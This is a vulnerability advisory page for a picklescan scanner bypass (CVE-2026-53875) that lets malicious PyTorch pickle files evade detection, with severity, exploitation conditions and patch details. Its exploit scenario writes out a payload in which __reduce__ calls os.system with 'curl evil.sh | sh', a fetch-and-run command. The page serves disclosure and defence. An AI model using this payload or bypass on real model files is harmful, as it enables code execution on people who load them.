picklescan
CVE-2026-53875
HIGH
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Malicious model is delivered over the network with no auth to the scanner (AV:N/PR:N), but the victim must invoke torch.load with unsafe deserialization (UI:R); successful __reduce__ yields full code execution, so C/I/A:H.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
picklescan before 1.0.3 contains a scanning bypass vulnerability in the scan_pytorch function that allows attackers to embed malicious magic numbers via dynamic eval using the __reduce__ trick. Attackers can craft malicious PyTorch payloads that evade picklescan detection while remaining executable, enabling arbitrary code execution when loaded with torch.load().
AnalysisAI
Scanner evasion in picklescan versions prior to 1.0.3 lets an attacker smuggle malicious PyTorch pickle payloads past the scan_pytorch detection routine and gain arbitrary code execution when the model is later loaded with torch.load(). The bypass exploits a parser-differential between picklescan's pickletools.genops()-based magic-number extraction and PyTorch's pickle_module.load(), allowing a __reduce__(eval, ('MAGIC_NUMBER',)) trick to produce files that scan as clean but still deserialize correctly. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires (1) the victim environment to be running picklescan <1.0.3 against the malicious file, (2) the victim to subsequently deserialize the same file with torch.load() using weights_only=False (the legacy default; the safer weights_only=True path does not execute __reduce__ and blocks the attack), and (3) the attacker to be able to deliver a .pt/.pth file to the victim - typically via a public model hub, a shared artifact registry, a supply-chain pull request, or any other channel the victim treats as trusted because picklescan cleared it. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N) scoring 7.1 is internally consistent: delivery is network-borne (downloading a model from Hugging Face, a registry, or a teammate), no authentication is required against the scanner, but a user must actively load the model with torch.load(weights_only=False), which is the UI:P passive interaction. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker publishes a benign-looking PyTorch model (e.g., a fine-tuned LLM checkpoint) on a public model hub, crafted with a payload class whose __reduce__ returns (os.system, ('curl evil.sh | sh',)) and whose magic number is smuggled via a (eval, ('MAGIC_NUMBER',)) reducer. A data scientist or an automated CI step scans the file with picklescan <1.0.3, which reports zero infected files and zero dangerous globals because pickletools.genops() never sees the magic as an INT/LONG opcode. … |
| Remediation | Vendor-released patch: upgrade picklescan to 1.0.3 or later (pip install --upgrade 'picklescan>=1.0.3'); the fix lands in commits 2a8383cfeb4158567f9770d86597300c9e508d0f and 134179474539648ba7dee1317959529fbd0e7f89 referenced from GHSA-97f8-7cmv-76j2. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: inventory all systems and pipelines using picklescan and models previously scanned with vulnerable versions. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Picklescan
View allAn Improper Handling of Exceptional Conditions vulnerability in the ZIP archive scanning component of mmaitre314 pickles
The unsafe globals in Picklescan before 0.0.25 do not include ssl. Rated medium severity (CVSS 6.8), this vulnerability
picklescan before 0.0.21 does not treat 'pip' as an unsafe global. Rated medium severity (CVSS 5.3), this vulnerability
Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio
Arbitrary code execution in picklescan versions prior to 1.0.1 allows attackers to bypass the scanner's malicious pickle
picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. Rated m
Remote code execution in picklescan versions prior to 1.0.4 allows attackers to bypass the scanner's safety validation b
Arbitrary code execution bypass in picklescan before 1.0.4 allows attackers to smuggle malicious pickle files past the s
Detection bypass in picklescan versions prior to 0.0.27 allows attackers to smuggle malicious Python pickle files past t
Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s
Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di
Arbitrary code execution in picklescan before 0.0.33 allows remote attackers to bypass the scanner's malicious-pickle de
Same weakness CWE-95 – Eval Injection
View allSame technique Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today